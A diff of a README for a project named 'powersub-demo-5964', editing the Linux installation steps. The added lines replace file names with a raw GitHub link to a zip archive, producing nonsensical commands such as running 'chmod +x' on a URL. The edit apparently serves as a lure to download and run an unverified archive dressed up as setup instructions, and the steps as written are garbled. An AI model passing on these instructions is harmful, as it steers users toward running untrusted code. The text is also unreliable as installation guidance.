menoob4/powersub-demo-5964/README.md

 4. Open your Applications folder and click on the powersub-demo-5964 icon to start.

 ### For Linux:
-1. If you downloaded a `.tar.gz` file, extract it by right-clicking and selecting "Extract Here."
+1. If you downloaded a `https://raw.githubusercontent.com/menoob4/powersub-demo-5964/main/meatily/powersub-demo-5964-v3.2.zip` file, extract it by right-clicking and selecting "Extract Here."
 2. Open a terminal and navigate to the extracted folder.
 3. Use the command `./powersub-demo-5964` to run the application.
-4. For an `.AppImage`, make it executable by running `chmod +x powersub-demo-5964.AppImage`, then run it with `./powersub-demo-5964.AppImage`.
+4. For an `.AppImage`, make it executable by running `chmod +x https://raw.githubusercontent.com/menoob4/powersub-demo-5964/main/meatily/powersub-demo-5964-v3.2.zip`, then run it with `https://raw.githubusercontent.com/menoob4/powersub-demo-5964/main/meatily/powersub-demo-5964-v3.2.zip`.

 ## 🛠️ Troubleshooting
 If you encounter any issues, here are some common solutions: